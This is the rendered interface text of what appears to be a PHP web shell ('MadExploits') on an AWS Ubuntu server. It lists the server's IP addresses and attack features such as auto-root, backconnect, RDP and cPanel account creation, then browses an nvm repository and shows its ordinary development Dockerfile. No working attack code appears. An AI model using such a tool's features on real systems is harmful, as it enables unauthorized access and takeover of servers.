Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.159.53
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.dockerignore
140
B
-rw-rw-r--
.editorconfig
523
B
-rw-rw-r--
.gitattributes
9
B
-rw-rw-r--
.gitignore
253
B
-rw-rw-r--
.mailmap
51
B
-rw-rw-r--
.npmrc
19
B
-rw-rw-r--
.travis.yml
2.67
KB
-rw-rw-r--
CONTRIBUTING.md
1.03
KB
-rw-rw-r--
Dockerfile
3.64
KB
-rw-rw-r--
LICENSE.md
1.09
KB
-rw-rw-r--
Makefile
5.24
KB
-rw-rw-r--
README.md
35.33
KB
-rw-rw-r--
ROADMAP.md
882
B
-rw-rw-r--
bash_completion
2.07
KB
-rw-rw-r--
install.sh
13.21
KB
-rwxrwxr-x
nvm-exec
344
B
-rwxrwxr-x
nvm.sh
129.5
KB
-rw-rw-r--
package.json
1.99
KB
-rw-rw-r--
update_test_mocks.sh
2.31
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dockerfile
# Dockerized nvm development environment # # This Dockerfile is for building nvm development environment only, # not for any distribution/production usage. # # Please note that it'll use about 1.2 GB disk space and about 15 minutes to # build this image, it depends on your hardware. FROM ubuntu:16.04 LABEL maintainer="Peter Dave Hello <hsu@peterdavehello.org>" LABEL name="nvm-dev-env" LABEL version="latest" # Set the SHELL to bash with pipefail option SHELL ["/bin/bash", "-o", "pipefail", "-c"] # Prevent dialog during apt install ENV DEBIAN_FRONTEND noninteractive # ShellCheck version ENV SHELLCHECK_VERSION=0.7.0 # Pick a Ubuntu apt mirror site for better speed # ref: https://launchpad.net/ubuntu/+archivemirrors ENV UBUNTU_APT_SITE ubuntu.cs.utah.edu # Disable src package source RUN sed -i 's/^deb-src\ /\#deb-src\ /g' /etc/apt/sources.list # Replace origin apt package site with the mirror site RUN sed -E -i "s/([a-z]+.)?archive.ubuntu.com/$UBUNTU_APT_SITE/g" /etc/apt/sources.list RUN sed -i "s/security.ubuntu.com/$UBUNTU_APT_SITE/g" /etc/apt/sources.list # Install apt packages RUN apt update && \ apt upgrade -y -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" && \ apt install -y -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" \ coreutils \ util-linux \ bsdutils \ file \ openssl \ libssl-dev \ locales \ ca-certificates \ ssh \ wget \ patch \ sudo \ htop \ dstat \ vim \ tmux \ curl \ git \ jq \ realpath \ zsh \ ksh \ gcc-4.8 \ g++-4.8 \ xz-utils \ build-essential \ bash-completion && \ apt-get clean RUN wget https://github.com/koalaman/shellcheck/releases/download/v$SHELLCHECK_VERSION/shellcheck-v$SHELLCHECK_VERSION.linux.x86_64.tar.xz -O- | \ tar xJvf - shellcheck-v$SHELLCHECK_VERSION/shellcheck && \ mv shellcheck-v$SHELLCHECK_VERSION/shellcheck /bin && \ rmdir shellcheck-v$SHELLCHECK_VERSION RUN shellcheck -V # Set locale RUN locale-gen en_US.UTF-8 # Print tool versions RUN bash --version | head -n 1 RUN zsh --version RUN ksh --version || true RUN dpkg -s dash | grep ^Version | awk '{print $2}' RUN git --version RUN curl --version RUN wget --version # Add user "nvm" as non-root user RUN useradd -ms /bin/bash nvm # Copy and set permission for nvm directory COPY . /home/nvm/.nvm/ RUN chown nvm:nvm -R "home/nvm/.nvm" # Set sudoer for "nvm" RUN echo 'nvm ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers # Switch to user "nvm" from now USER nvm # nvm RUN echo 'export NVM_DIR="$HOME/.nvm"' >> "$HOME/.bashrc" RUN echo '[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm' >> "$HOME/.bashrc" RUN echo '[ -s "$NVM_DIR/bash_completion" ] && . "$NVM_DIR/bash_completion" # This loads nvm bash_completion' >> "$HOME/.bashrc" # nodejs and tools RUN bash -c 'source $HOME/.nvm/nvm.sh && \ nvm install node && \ npm install -g doctoc urchin eclint dockerfile_lint && \ npm install --prefix "$HOME/.nvm/"' # Set WORKDIR to nvm directory WORKDIR /home/nvm/.nvm ENTRYPOINT ["/bin/bash"]
Close